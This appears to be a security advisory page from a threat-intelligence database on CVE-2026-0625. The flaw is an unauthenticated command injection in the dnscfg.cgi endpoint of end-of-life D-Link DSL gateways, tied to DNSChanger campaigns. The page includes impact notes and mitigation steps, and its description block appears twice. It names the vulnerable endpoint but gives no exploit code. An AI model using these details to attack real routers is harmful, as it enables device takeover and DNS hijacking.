CVE-2026-0625: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in D-Link DSL-2640B
Multiple D-Link DSL gateway devices contain a command injection vulnerability in the dnscfg.cgi endpoint due to improper sanitization of user-supplied DNS configuration parameters. An unauthenticated remote attacker can inject and execute arbitrary shell commands, resulting in remote code execution. The affected endpoint is also associated with unauthenticated DNS modification (“DNSChanger”) behavior documented by D-Link, which reported active exploitation campaigns targeting firmware variants of the DSL-2740R, DSL-2640B, DSL-2780B, and DSL-526B models from 2016 through 2019. Exploitation evidence was observed by the Shadowserver Foundation on 2025-11-27 (UTC). Affected devices were declared end-of-life/end-of-service in early 2020.
AI Analysis
Technical Summary
CVE-2026-0625 is an OS command injection vulnerability categorized under CWE-78, found in the dnscfg.cgi endpoint of D-Link DSL-2640B and related DSL gateway devices. The root cause is improper neutralization of special characters in user-supplied DNS configuration parameters, allowing attackers to inject arbitrary shell commands. The vulnerability is exploitable remotely without authentication or user interaction, making it highly dangerous. The affected endpoint is also linked to DNS modification attacks, known as “DNSChanger,” which have been actively exploited in the wild targeting multiple D-Link DSL models from 2016 to 2019. Despite the devices being declared end-of-life in early 2020, recent exploitation evidence from November 2025 indicates ongoing risks. The vulnerability has a CVSS 4.0 base score of 9.3, reflecting its critical nature with high impact on confidentiality, integrity, and availability. No patches or firmware updates have been provided by the vendor, leaving legacy devices vulnerable to remote code execution attacks that could lead to full device compromise, network infiltration, or DNS hijacking.
Potential Impact
For European organizations, this vulnerability poses a significant threat, especially for those still using legacy D-Link DSL gateway devices in their network infrastructure. Successful exploitation can lead to complete device takeover, enabling attackers to manipulate DNS settings, redirect traffic, intercept sensitive data, or launch further attacks within the internal network. This can compromise confidentiality, integrity, and availability of organizational data and services. Critical infrastructure providers, small and medium enterprises, and residential ISPs relying on these devices are particularly at risk. The lack of vendor support and patches increases the likelihood of persistent exploitation. Additionally, DNS manipulation can facilitate phishing, malware distribution, and espionage campaigns targeting European entities. The ongoing exploitation evidence suggests that threat actors continue to leverage this vulnerability, underscoring the urgency for mitigation.
Mitigation Recommendations
Given the absence of official patches, European organizations should prioritize immediate mitigation steps: 1) Identify and inventory all D-Link DSL-2640B and related affected models within their networks. 2) Replace end-of-life devices with modern, supported hardware that receives regular security updates. 3) If replacement is not immediately feasible, isolate vulnerable devices on segmented networks with strict access controls to limit exposure. 4) Disable remote management interfaces, especially those exposing the dnscfg.cgi endpoint, to prevent unauthenticated access. 5) Monitor network traffic for unusual DNS configuration changes or command injection indicators. 6) Employ network-level DNS filtering and anomaly detection to detect and block malicious DNS modifications. 7) Educate IT staff about the risks of legacy device usage and the importance of timely hardware upgrades. 8) Collaborate with ISPs and vendors to ensure secure configurations and firmware updates where possible.
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Belgium
CVE-2026-0625: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in D-Link DSL-2640B
Description
Multiple D-Link DSL gateway devices contain a command injection vulnerability in the dnscfg.cgi endpoint due to improper sanitization of user-supplied DNS configuration parameters. An unauthenticated remote attacker can inject and execute arbitrary shell commands, resulting in remote code execution. The affected endpoint is also associated with unauthenticated DNS modification (“DNSChanger”) behavior documented by D-Link, which reported active exploitation campaigns targeting firmware variants of the DSL-2740R, DSL-2640B, DSL-2780B, and DSL-526B models from 2016 through 2019. Exploitation evidence was observed by the Shadowserver Foundation on 2025-11-27 (UTC). Affected devices were declared end-of-life/end-of-service in early 2020.
AI-Powered Analysis
Technical Analysis
CVE-2026-0625 is an OS command injection vulnerability categorized under CWE-78, found in the dnscfg.cgi endpoint of D-Link DSL-2640B and related DSL gateway devices. The root cause is improper neutralization of special characters in user-supplied DNS configuration parameters, allowing attackers to inject arbitrary shell commands. The vulnerability is exploitable remotely without authentication or user interaction, making it highly dangerous. The affected endpoint is also linked to DNS modification attacks, known as “DNSChanger,” which have been actively exploited in the wild targeting multiple D-Link DSL models from 2016 to 2019. Despite the devices being declared end-of-life in early 2020, recent exploitation evidence from November 2025 indicates ongoing risks. The vulnerability has a CVSS 4.0 base score of 9.3, reflecting its critical nature with high impact on confidentiality, integrity, and availability. No patches or firmware updates have been provided by the vendor, leaving legacy devices vulnerable to remote code execution attacks that could lead to full device compromise, network infiltration, or DNS hijacking.
Potential Impact
For European organizations, this vulnerability poses a significant threat, especially for those still using legacy D-Link DSL gateway devices in their network infrastructure. Successful exploitation can lead to complete device takeover, enabling attackers to manipulate DNS settings, redirect traffic, intercept sensitive data, or launch further attacks within the internal network. This can compromise confidentiality, integrity, and availability of organizational data and services. Critical infrastructure providers, small and medium enterprises, and residential ISPs relying on these devices are particularly at risk. The lack of vendor support and patches increases the likelihood of persistent exploitation. Additionally, DNS manipulation can facilitate phishing, malware distribution, and espionage campaigns targeting European entities. The ongoing exploitation evidence suggests that threat actors continue to leverage this vulnerability, underscoring the urgency for mitigation.
Mitigation Recommendations
Given the absence of official patches, European organizations should prioritize immediate mitigation steps: 1) Identify and inventory all D-Link DSL-2640B and related affected models within their networks. 2) Replace end-of-life devices with modern, supported hardware that receives regular security updates. 3) If replacement is not immediately feasible, isolate vulnerable devices on segmented networks with strict access controls to limit exposure. 4) Disable remote management interfaces, especially those exposing the dnscfg.cgi endpoint, to prevent unauthenticated access. 5) Monitor network traffic for unusual DNS configuration changes or command injection indicators. 6) Employ network-level DNS filtering and anomaly detection to detect and block malicious DNS modifications. 7) Educate IT staff about the risks of legacy device usage and the importance of timely hardware upgrades. 8) Collaborate with ISPs and vendors to ensure secure configurations and firmware updates where possible.
Affected Countries
Technical Details
- Data Version
- 5.2
- Assigner Short Name
- VulnCheck
- Date Reserved
- 2026-01-05T20:59:29.705Z
- Cvss Version
- 4.0
- State
- PUBLISHED
Threat ID: 695c2bac3839e441759217e3
Added to database: 1/5/2026, 9:22:52 PM
Last enriched: 1/5/2026, 9:37:08 PM
Last updated: 1/8/2026, 12:30:14 PM
Views: 71
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
CVE-2024-1574: CWE-470 Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') in Mitsubishi Electric Iconics Digital Solutions GENESIS64
MediumCVE-2024-1573: CWE-306 Missing Authentication for Critical Function in Mitsubishi Electric Iconics Digital Solutions GENESIS64
MediumCVE-2024-1182: CWE-427 Uncontrolled Search Path Element in Mitsubishi Electric Iconics Digital Solutions GENESIS64
HighCVE-2025-66001: CWE-295: Improper Certificate Validation in SUSE neuvector
HighCVE-2026-21874: CWE-772: Missing Release of Resource after Effective Lifetime in zauberzeug nicegui
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.